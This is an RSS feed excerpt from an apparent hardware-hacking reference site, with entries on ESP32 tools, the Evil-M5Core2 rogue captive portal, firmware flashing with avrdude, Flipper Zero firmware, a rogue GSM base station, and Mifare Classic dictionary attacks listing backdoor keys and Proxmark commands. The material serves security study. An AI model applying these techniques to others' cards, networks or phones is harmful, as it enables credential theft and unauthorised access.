&lt;li&gt;&lt;a href="https://www.espressif.com/sites/default/files/documentation/esp32_datasheet_en.pdf"&gt;ESP32 datasheet: esp32_datasheet_en.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://0x04.net/~mwk/doc/xtensa.pdf"&gt;Xtensa®Instruction Set Architecture (ISA)&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;ESP32 and ESP8266 share almost the same architecture.&lt;/p&gt;
&lt;h2 id="tools" class="anchored-heading"&gt;Tools&lt;a class="heading-anchor" href="#tools" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/espressif/esptool"&gt;espressif/esptool&lt;/a&gt; - Espressif SoC serial bootloader utility&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/jmswrnr/esp32knife"&gt;jmswrnr/esp32knife&lt;/a&gt; - Tools for ESP32 firmware dissection&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/scientifichackers/ampy"&gt;scientifichackers/ampy&lt;/a&gt; - Utility to interact with a MicroPython board over a serial connection&lt;/li&gt;
&lt;li&gt;&lt;a href="https://esp.huhn.me/"&gt;ESPWebTool&lt;/a&gt; - Flash your ESP32 or ESP8266 through your browser.&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/tenable/esp32_image_parser"&gt;tenable/esp32_image_parser&lt;/a&gt; - A toolkit for helping you reverse engineer ESP32 firmware.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="firmwares" class="anchored-heading"&gt;Firmwares&lt;a class="heading-anchor" href="#firmwares" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/risinek/esp32-wifi-penetration-tool"&gt;risinek/esp32-wifi-penetration-tool&lt;/a&gt; - Exploring possibilities of ESP32 platform to attack on nearby Wi-Fi networks.&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/justcallmekoko/ESP32Marauder"&gt;justcallmekoko/ESP32Marauder&lt;/a&gt; - A suite of WiFi/Bluetooth offensive and defensive tools for the ESP32&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="flashing" class="anchored-heading"&gt;Flashing&lt;a class="heading-anchor" href="#flashing" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;The ESP32 microprocessor uses the Xtensa instruction set, use &lt;code&gt;Tensilica Xtensa 32-bit little-endian&lt;/code&gt; in Ghidra.&lt;/p&gt;</description></item><item><title>Evil M5Core2</title><link>https://bokkapig.pages.dev/refs/hardware/gadgets/m5stack/</link><pubDate>Sun, 12 Jul 2026 22:01:52 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/hardware/gadgets/m5stack/</guid><description>&lt;blockquote&gt;
&lt;p&gt;Evil-M5Core2 is an easy Evil portal and rogue app deployement software designed to work on M5Stack Core2.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;figure class="writeup-figure"&gt;
 &lt;img src="https://raw.githubusercontent.com/7h30th3r0n3/Evil-M5Core2/main/Github-Img/menu-1.jpg" alt="Evil-M5Core2" loading="lazy" decoding="async"&gt;&lt;figcaption&gt;Evil-M5Core2&lt;/figcaption&gt;&lt;/figure&gt;&lt;h2 id="features" class="anchored-heading"&gt;Features&lt;a class="heading-anchor" href="#features" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;WiFi Network Scanning&lt;/strong&gt;: Identify and display nearby WiFi networks.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Network Cloning&lt;/strong&gt;: Check information and replicate networks for in-depth analysis.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Captive Portal Management&lt;/strong&gt;: Create and operate a captive portal to prompt users with a page upon connection.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Credential Handling&lt;/strong&gt;: Capture and manage portal credentials.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Remote Web Server&lt;/strong&gt;: Monitor the device remotely via a simple web interface that can provide credentials and upload portal that store file on SD card.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Sniffing probes&lt;/strong&gt;: Sniff and store on SD near probes.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Karma Attack&lt;/strong&gt;: Try a simple Karma Attack on a captured probe.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Automated Karma Attack&lt;/strong&gt;: Try Karma Attack on near probe automatically&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="firmwares" class="anchored-heading"&gt;Firmwares&lt;a class="heading-anchor" href="#firmwares" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Firmware: &lt;a href="https://github.com/7h30th3r0n3/Evil-M5Core2"&gt;7h30th3r0n3/Evil-M5Core2&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Requirements&lt;/strong&gt;:&lt;/p&gt;</description></item><item><title>Fault Injection</title><link>https://bokkapig.pages.dev/refs/hardware/side-channel/fault-injection/</link><pubDate>Sun, 12 Jul 2026 22:01:52 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/hardware/side-channel/fault-injection/</guid><description>&lt;h2 id="power--vcc---voltage-glitch" class="anchored-heading"&gt;Power / VCC - Voltage Glitch&lt;a class="heading-anchor" href="#power--vcc---voltage-glitch" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;Power glitch injection is a physical attack technique used to test and exploit vulnerabilities in electronic devices by causing controlled, temporary power disturbances.
A VCC glitch, also known as a supply voltage glitch, is a specific type of power glitch attack targeting the voltage supply (VCC) of a microcontroller or integrated circuit (IC) in electronic devices.&lt;/p&gt;
&lt;p&gt;The primary goals of this attack are often one of the following:&lt;/p&gt;</description></item><item><title>FCC ID</title><link>https://bokkapig.pages.dev/refs/hardware/enumeration/fcc-id/</link><pubDate>Sun, 12 Jul 2026 22:01:52 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/hardware/enumeration/fcc-id/</guid><description>&lt;h2 id="searchable-fcc-id-database" class="anchored-heading"&gt;Searchable FCC ID Database&lt;a class="heading-anchor" href="#searchable-fcc-id-database" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;An FCC ID is a unique identifier assigned to a device registered with the United States Federal Communications Commission.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://fccid.io/"&gt;fccid.io&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;For legal sale of wireless deices in the US, manufacturers must:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Have the device evaluated by an independent lab to ensure it conforms to FCC standards&lt;/li&gt;
&lt;li&gt;Provide documentation to the FCC of the lab results&lt;/li&gt;
&lt;li&gt;Provide User Manuals, Documentation, and Photos relating to the device&lt;/li&gt;
&lt;li&gt;&lt;a href="https://fccid.io/blog/2014/11/e-label-act/"&gt;Digitally&lt;/a&gt; or physically label the device with the unique identifier provided by the FCC (upon approved application)&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Firmware Dumping</title><link>https://bokkapig.pages.dev/refs/hardware/firmware/firmware-dumping/</link><pubDate>Sun, 12 Jul 2026 22:01:52 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/hardware/firmware/firmware-dumping/</guid><description>&lt;h2 id="flash-memory-types" class="anchored-heading"&gt;Flash Memory Types&lt;a class="heading-anchor" href="#flash-memory-types" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;NOR Flash (SOIC8 package)
&lt;ul&gt;
&lt;li&gt;SPI Flash&lt;/li&gt;
&lt;li&gt;Mostly error &amp;ldquo;Fault-free&amp;rdquo; memory&lt;/li&gt;
&lt;li&gt;Used for embedded device that need fast execution, but low storage capacity&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;NAND Flash (TSOP48 package)&lt;/li&gt;
&lt;li&gt;eMMC Flash (BGA{153} package)&lt;/li&gt;
&lt;li&gt;UFS Universal Flash Storage&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="flash-a-new-firmware-into-the-microcontroller" class="anchored-heading"&gt;Flash a new firmware into the microcontroller&lt;a class="heading-anchor" href="#flash-a-new-firmware-into-the-microcontroller" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Using &lt;a href="https://github.com/avrdudes/avrdude"&gt;avrdudes/avrdude&lt;/a&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# send raw data firmware&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;$&lt;/span&gt; &lt;span class="n"&gt;avrdude&lt;/span&gt; &lt;span class="n"&gt;-p&lt;/span&gt; &lt;span class="n"&gt;m328p&lt;/span&gt; &lt;span class="n"&gt;-c&lt;/span&gt; &lt;span class="n"&gt;usbasp&lt;/span&gt; &lt;span class="n"&gt;-P&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;dev&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;ttyUSB0&lt;/span&gt; &lt;span class="n"&gt;-b&lt;/span&gt; &lt;span class="mf"&gt;9600&lt;/span&gt; &lt;span class="n"&gt;-U&lt;/span&gt; &lt;span class="n"&gt;flash&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;w:flash_raw&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;bin&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# send ihex firmware&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;$&lt;/span&gt; &lt;span class="n"&gt;avrdude&lt;/span&gt; &lt;span class="n"&gt;-c&lt;/span&gt; &lt;span class="n"&gt;arduino&lt;/span&gt; &lt;span class="n"&gt;-p&lt;/span&gt; &lt;span class="n"&gt;atmega328p&lt;/span&gt; &lt;span class="n"&gt;-P&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;dev&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;ttyUSB&lt;/span&gt;&lt;span class="p"&gt;*&lt;/span&gt; &lt;span class="n"&gt;-b115200&lt;/span&gt; &lt;span class="n"&gt;-u&lt;/span&gt; &lt;span class="n"&gt;-V&lt;/span&gt; &lt;span class="n"&gt;-U&lt;/span&gt; &lt;span class="n"&gt;flash&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;w:CHALLENGE&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;hex&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;$&lt;/span&gt; &lt;span class="n"&gt;avrdude&lt;/span&gt; &lt;span class="n"&gt;-c&lt;/span&gt; &lt;span class="n"&gt;usbasp&lt;/span&gt; &lt;span class="n"&gt;-p&lt;/span&gt; &lt;span class="n"&gt;m328p&lt;/span&gt; &lt;span class="o"&gt;-F&lt;/span&gt; &lt;span class="n"&gt;-U&lt;/span&gt; &lt;span class="n"&gt;flash&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;r:dump&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;hex&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# default&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;$&lt;/span&gt; &lt;span class="n"&gt;avrdude&lt;/span&gt; &lt;span class="n"&gt;-c&lt;/span&gt; &lt;span class="n"&gt;usbasp&lt;/span&gt; &lt;span class="n"&gt;-p&lt;/span&gt; &lt;span class="n"&gt;m328p&lt;/span&gt; &lt;span class="n"&gt;-C&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;etc&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;avrdude&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;conf&lt;/span&gt; &lt;span class="n"&gt;-U&lt;/span&gt; &lt;span class="n"&gt;flash&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;w:hardcodedPassword&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;ino&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;arduino_standard&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;hex&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Using &lt;a href="https://github.com/raspberrypi/picotool"&gt;raspberrypi/picotool&lt;/a&gt;&lt;/p&gt;</description></item><item><title>Firmware Reverse Engineering</title><link>https://bokkapig.pages.dev/refs/hardware/firmware/firmware-reverse-engineering/</link><pubDate>Sun, 12 Jul 2026 22:01:52 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/hardware/firmware/firmware-reverse-engineering/</guid><description>&lt;h2 id="loading-bare-metal-binaries-into-ida" class="anchored-heading"&gt;Loading bare-metal binaries into IDA&lt;a class="heading-anchor" href="#loading-bare-metal-binaries-into-ida" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;Requirements:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The &lt;strong&gt;load address&lt;/strong&gt; is the address in memory that the binary is being executed from.&lt;/li&gt;
&lt;li&gt;The &lt;strong&gt;entry point&lt;/strong&gt; is the location within the binary where the processor starts executing.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;⚠️ For ARM Arduino firwmare the entry point is located at &lt;strong&gt;_RESET&lt;/strong&gt; interruption.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;To load it properly in IDA, open the file, select ATMEL AVR and then select ATmega323_L.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;ul&gt;
&lt;li&gt;ESP8266 : &lt;a href="https://github.com/themadinventor/ida-xtensa"&gt;https://github.com/themadinventor/ida-xtensa&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="loading-bare-metal-binaries-into-radare2" class="anchored-heading"&gt;Loading bare-metal binaries into Radare2&lt;a class="heading-anchor" href="#loading-bare-metal-binaries-into-radare2" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;Radare2 can disassemble &lt;code&gt;avr&lt;/code&gt;, &lt;code&gt;arduino&lt;/code&gt; natively&lt;/p&gt;</description></item><item><title>Flipper Zero</title><link>https://bokkapig.pages.dev/refs/hardware/gadgets/flipper-zero/</link><pubDate>Sun, 12 Jul 2026 22:01:52 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/hardware/gadgets/flipper-zero/</guid><description>&lt;figure class="writeup-figure"&gt;
 &lt;img src="https://bokkapig.pages.dev/refs/hardware/assets/image-flipper-cover.png" alt="FlipperZero" width="1080" height="360" loading="lazy" decoding="async"&gt;&lt;figcaption&gt;FlipperZero&lt;/figcaption&gt;&lt;/figure&gt;&lt;h2 id="firmwares" class="anchored-heading"&gt;Firmwares&lt;a class="heading-anchor" href="#firmwares" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/flipperdevices/flipperzero-firmware"&gt;Flipper Zero Firmware&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/Eng1n33r/flipperzero-firmware"&gt;Flipper Zero Unleashed Firmware&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/RogueMaster/flipperzero-firmware-wPlugins"&gt;Flipper Zero FW RogueMaster&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/Flipper-XFW/Xtreme-Firmware"&gt;Flipper Zero Xtreme-Firmware&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/Next-Flip/Momentum-Firmware"&gt;Flipper Zero Momentum-Firmware&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="firmware-update---pc" class="anchored-heading"&gt;Firmware Update - PC&lt;a class="heading-anchor" href="#firmware-update---pc" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;Update to the latest firmware using &lt;a href="https://flipperzero.one/update"&gt;https://flipperzero.one/update&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Download and install qFlipper&lt;/li&gt;
&lt;li&gt;Connect your Flipper Zero via USB, update to the official firmware&lt;/li&gt;
&lt;li&gt;Disconnect from USB, power off the Flipper Zero, and remove the SD to prepare it for flashing.&lt;/li&gt;
&lt;li&gt;Download the latest &lt;a href="https://github.com/RogueMaster/flipperzero-firmware-wPlugins"&gt;RogueMaster&lt;/a&gt; firmware from their Github Page.&lt;/li&gt;
&lt;li&gt;Unzip the downloaded .zip and copy the content into /update of the Flipper SD card (including the .dfu)&lt;/li&gt;
&lt;li&gt;On the Flipper Zero, once booted, press down, and left until you are on the &amp;lsquo;Browser&amp;rsquo; screen. Scroll down until you see the &amp;lsquo;update&amp;rsquo; directory and click on it.&lt;/li&gt;
&lt;li&gt;You should now see the contents you uploaded and an &amp;lsquo;update&amp;rsquo; option. Hover over the &amp;lsquo;update&amp;rsquo; option, click the center button on your Flipper, once again on the &amp;lsquo;Run in App&amp;rsquo; option.&lt;/li&gt;
&lt;/ol&gt;
&lt;h3 id="firmware-update---webupdater" class="anchored-heading"&gt;Firmware Update - WebUpdater&lt;a class="heading-anchor" href="#firmware-update---webupdater" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://lab.flipper.net/?url=https://unleashedflip.com/fw_extra_apps/flipper-z-f7-update-unlshd-038e.tgz&amp;amp;channel=release-cfw&amp;amp;version=unlshd-038e"&gt;DarkFlippers/unleashed-firmware - Web Update&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://lab.flipper.net/?url=https%3A%2F%2Frogue-master.net%2F%3Ffile%3DRM0322-1504-0.79.2-22158b0.tgz&amp;amp;channel=RM0322-1504-0.79.2-22158b0&amp;amp;version=0.79.2"&gt;RogueMaster/flipperzero-firmware-wPlugins - Web Update&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="gpio" class="anchored-heading"&gt;GPIO&lt;a class="heading-anchor" href="#gpio" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;figure class="writeup-figure"&gt;
 &lt;img src="https://bokkapig.pages.dev/refs/hardware/assets/flipper-gpio.png" alt="GPIO Flipper" width="1774" height="1250" loading="lazy" decoding="async"&gt;&lt;figcaption&gt;GPIO Flipper&lt;/figcaption&gt;&lt;/figure&gt;&lt;h2 id="videos" class="anchored-heading"&gt;Videos&lt;a class="heading-anchor" href="#videos" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=tB0eYatvu0k"&gt;Flipper Zero: Want some good news? - Penthertz&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=W5YYObSBUno"&gt;Flipper Zero: is this for you? Follow our 1st tests! - Penthertz&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/playlist?list=PLq_UnUtYZ15eoAiElH4T2XEB29iwZSi5a"&gt;Flipper Zero: french collection video on the Flipper Zero, tutorial and explain&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="tutorials-and-resources" class="anchored-heading"&gt;Tutorials and Resources&lt;a class="heading-anchor" href="#tutorials-and-resources" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://flipper.pingywon.com/flipper/"&gt;Flipper Zero Hacking 101 - pingywon&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/UberGuidoZ/Flipper"&gt;Flipper Zero Playground - UberGuidoZ&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://interestingsoup.com/n00b-guide-flashing-flipper-zero-to-rougemaster/"&gt;Flashing Flipper Zero with RogueMaster CFW&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/DarkFlippers/unleashed-firmware/blob/dev/documentation/HowToInstall.md"&gt;Unleashed Firmware - Update firmware&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="ioc" class="anchored-heading"&gt;IOC&lt;a class="heading-anchor" href="#ioc" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://standards-oui.ieee.org/oui/oui.txt"&gt;MAC addresses&lt;/a&gt; from IEEE for Flipper Zero: &lt;code&gt;0C:FA:22:XX:XX:XX&lt;/code&gt;.
This applies to Bluetooth, Ethernet, WiFi interfaces.&lt;/p&gt;</description></item><item><title>GoodFET</title><link>https://bokkapig.pages.dev/refs/hardware/gadgets/goodfet/</link><pubDate>Sun, 12 Jul 2026 22:01:52 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/hardware/gadgets/goodfet/</guid><description>&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/travisgoodspeed/goodfet"&gt;travisgoodspeed/goodfet&lt;/a&gt; - An embedded bus adapter for various microcontrollers and radios.&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/greatscottgadgets/Facedancer"&gt;greatscottgadgets/Facedancer&lt;/a&gt; - modern FaceDancer core for multiple devices&amp;ndash; including GreatFET&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="facedancer" class="anchored-heading"&gt;Facedancer&lt;a class="heading-anchor" href="#facedancer" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;The Facedancer21 is the twenty-fourth hardware revision of the GoodFET, owing its heritage to the GoodFET41 and Facedancer20. Unlike the general-purpose GoodFET boards, the only purpose of this board is to allow USB devices to be written in host-side Python, so that one workstation can fuzz-test the USB device drivers of another host.&lt;/p&gt;</description></item><item><title>GPS - Global Positioning System</title><link>https://bokkapig.pages.dev/refs/hardware/protocols/gps/</link><pubDate>Sun, 12 Jul 2026 22:01:52 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/hardware/protocols/gps/</guid><description>&lt;p&gt;TODO&lt;/p&gt;</description></item><item><title>GSM Network: LimeSDR</title><link>https://bokkapig.pages.dev/refs/hardware/radio-frequency/limesdr-bts/</link><pubDate>Sun, 12 Jul 2026 22:01:52 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/hardware/radio-frequency/limesdr-bts/</guid><description>&lt;p&gt;&lt;strong&gt;DISCLAIMER&lt;/strong&gt;: This procedure is highly illegal in most parts of the world. Be sure to run this in a closed RF environment (also known as Faraday Cage)&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#running-a-gsm-station-with-osmo-network-in-a-box"&gt;Running a GSM Station with osmo network-in-a-box (sms/audio)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Running a GSM Station with full osmo (sms/audio/data) [TODO]&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="running-a-gsm-station-with-osmo-network-in-a-box" class="anchored-heading"&gt;Running a GSM Station with osmo network-in-a-box&lt;a class="heading-anchor" href="#running-a-gsm-station-with-osmo-network-in-a-box" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;For this example we will use the Osmocom GSM Stack in the NITB (Network in a box) mode. In this mode the phones connected to your BTS will be able to call each other and send SMS messages. There is also the Interconnect mode in which the BSC (Base Station Controller) connects to a ISDN or IPBX (for example Asterisk) to manage the connected phones. You can check the different modes here: &lt;a href="https://osmocom.org/projects/openbsc/wiki/OpenBSC#Configurations-Modes"&gt;https://osmocom.org/projects/openbsc/wiki/OpenBSC#Configurations-Modes&lt;/a&gt;&lt;/p&gt;</description></item><item><title>HF - Mifare Classic</title><link>https://bokkapig.pages.dev/refs/hardware/protocols/rfid-nfc/hf-mifare-classic/</link><pubDate>Sun, 12 Jul 2026 22:01:52 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/hardware/protocols/rfid-nfc/hf-mifare-classic/</guid><description>&lt;h2 id="hf---mifare-classic-1k" class="anchored-heading"&gt;HF - Mifare Classic 1k&lt;a class="heading-anchor" href="#hf---mifare-classic-1k" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;New method for Proxmark : &lt;code&gt;hf mf autopwn&lt;/code&gt;&lt;/p&gt;
&lt;h3 id="dictionary-attack" class="anchored-heading"&gt;Dictionary attack&lt;a class="heading-anchor" href="#dictionary-attack" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;p&gt;Common keys to try against the card when attempting a dictionnary attack.&lt;/p&gt;
&lt;table&gt;
 &lt;thead&gt;
 &lt;tr&gt;
 &lt;th&gt;Key&lt;/th&gt;
 &lt;th&gt;Description&lt;/th&gt;
 &lt;/tr&gt;
 &lt;/thead&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td&gt;FFFFFFFFFFFF&lt;/td&gt;
 &lt;td&gt;Default key&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;000000000000&lt;/td&gt;
 &lt;td&gt;Blank key&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;A396EFA4E24F&lt;/td&gt;
 &lt;td&gt;FM11RF08S universal backdoor key&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;A31667A8CEC1&lt;/td&gt;
 &lt;td&gt;FM11RF08 older backdoor key&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;More keys and dictionnaries can be found at the following links:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/RfidResearchGroup/proxmark3/tree/master/client/dictionaries"&gt;RfidResearchGroup/proxmark3/dictionaries&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/ikarus23/MifareClassicTool/blob/master/Mifare%20Classic%20Tool/app/src/main/assets/key-files/std.keys"&gt;ikarus23/MifareClassicTool/std.keys&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/ikarus23/MifareClassicTool/blob/master/Mifare%20Classic%20Tool/app/src/main/assets/key-files/extended-std.keys"&gt;ikarus23/MifareClassicTool/extended-std.keys&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;hf&lt;/span&gt; &lt;span class="n"&gt;mf&lt;/span&gt; &lt;span class="n"&gt;chk&lt;/span&gt; &lt;span class="p"&gt;*&lt;/span&gt;&lt;span class="mf"&gt;1&lt;/span&gt; &lt;span class="p"&gt;?&lt;/span&gt; &lt;span class="n"&gt;t&lt;/span&gt; &lt;span class="c"&gt;# Default keys&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;hf&lt;/span&gt; &lt;span class="n"&gt;mf&lt;/span&gt; &lt;span class="n"&gt;chk&lt;/span&gt; &lt;span class="p"&gt;*&lt;/span&gt;&lt;span class="mf"&gt;1&lt;/span&gt; &lt;span class="p"&gt;?&lt;/span&gt; &lt;span class="n"&gt;d&lt;/span&gt; &lt;span class="n"&gt;default_keys&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;dic&lt;/span&gt;
